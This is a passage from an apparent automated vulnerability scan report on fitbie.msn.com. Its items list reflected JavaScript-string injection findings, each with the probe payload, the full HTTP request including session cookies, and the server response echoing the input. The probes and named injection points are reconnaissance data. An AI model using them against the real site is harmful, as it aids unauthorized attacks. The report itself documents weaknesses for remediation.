Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:58 +0000
ETag: "1297607398-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:59 GMT
Date: Sun, 13 Feb 2011 14:29:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default226f4';c8e94e44f55?destination=node%2Fdefault226f4';c8e94e44f55&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.93. http://fitbie.msn.com/sites/default/files/jennie-nickel-after-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/jennie-nickel-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30a32'%3b31c71af9932 was submitted in the REST URL parameter 2. This input was echoed as 30a32';31c71af9932 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default30a32'%3b31c71af9932/files/jennie-nickel-after-th.jpg?1295907493 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:35 +0000
ETag: "1297607195-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:36 GMT
Date: Sun, 13 Feb 2011 14:26:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default30a32';31c71af9932?destination=node%2Fdefault30a32';31c71af9932&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.94. http://fitbie.msn.com/sites/default/files/kenneth-after-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/kenneth-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b069'%3b51b80e55f8e was submitted in the REST URL parameter 2. This input was echoed as 9b069';51b80e55f8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default9b069'%3b51b80e55f8e/files/kenneth-after-th.jpg?1294790161 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:38 +0000
ETag: "1297607198-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:38 GMT
Date: Sun, 13 Feb 2011 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default9b069';51b80e55f8e?destination=node%2Fdefault9b069';51b80e55f8e&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.95. http://fitbie.msn.com/sites/default/files/lat_pull_B-female-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/lat_pull_B-female-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c5'%3be409784d715 was submitted in the REST URL parameter 2. This input was echoed as d86c5';e409784d715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultd86c5'%3be409784d715/files/lat_pull_B-female-th.jpg?1284678504 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:34 +0000
ETag: "1297607374-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:35 GMT
Date: Sun, 13 Feb 2011 14:29:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd86c5';e409784d715?destination=node%2Fdefaultd86c5';e409784d715&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.96. http://fitbie.msn.com/sites/default/files/lean-belly-dumbbell-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/lean-belly-dumbbell-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd120'%3ba60af6d7a3c was submitted in the REST URL parameter 2. This input was echoed as bd120';a60af6d7a3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultbd120'%3ba60af6d7a3c/files/lean-belly-dumbbell-th_1.jpg?1296175022 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:50 +0000
ETag: "1297607390-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:51 GMT
Date: Sun, 13 Feb 2011 14:29:51 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultbd120';a60af6d7a3c?destination=node%2Fdefaultbd120';a60af6d7a3c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.97. http://fitbie.msn.com/sites/default/files/look_better_naked_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/look_better_naked_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b98'%3b0a04eae77f was submitted in the REST URL parameter 2. This input was echoed as 68b98';0a04eae77f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default68b98'%3b0a04eae77f/files/look_better_naked_th.jpg?1286918148 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:04 +0000
ETag: "1297607404-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:05 GMT
Date: Sun, 13 Feb 2011 14:30:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default68b98';0a04eae77f?destination=node%2Fdefault68b98';0a04eae77f&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.98. http://fitbie.msn.com/sites/default/files/mh_personal_trainer_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/mh_personal_trainer_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d468c'%3b43c9ce21767 was submitted in the REST URL parameter 2. This input was echoed as d468c';43c9ce21767 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultd468c'%3b43c9ce21767/files/mh_personal_trainer_th.jpg?1286832577 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:02 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd468c';43c9ce21767?destination=node%2Fdefaultd468c';43c9ce21767&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.99. http://fitbie.msn.com/sites/default/files/muscular-man-lifting-dumbbell-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/muscular-man-lifting-dumbbell-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28b05'%3bf096ad2ca7c was submitted in the REST URL parameter 2. This input was echoed as 28b05';f096ad2ca7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default28b05'%3bf096ad2ca7c/files/muscular-man-lifting-dumbbell-th.jpg?1297382745 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
